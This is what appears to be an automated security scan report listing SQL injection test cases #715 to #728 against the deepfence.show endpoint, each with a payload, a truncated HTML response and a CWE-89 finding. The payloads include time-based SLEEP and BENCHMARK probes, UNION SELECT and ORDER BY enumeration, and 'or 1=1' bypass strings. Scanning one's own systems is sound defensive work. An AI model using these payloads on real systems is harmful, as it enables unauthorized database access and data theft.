https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #715\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io or pg_SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #716\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #717\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #718\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #719Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #720\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #721\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #722\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #723\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1-true\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #724\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) \nAND 'vRxe'='vRxe\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #725\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)+CHAR(113)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #726\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #727\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin' or 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #728\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta 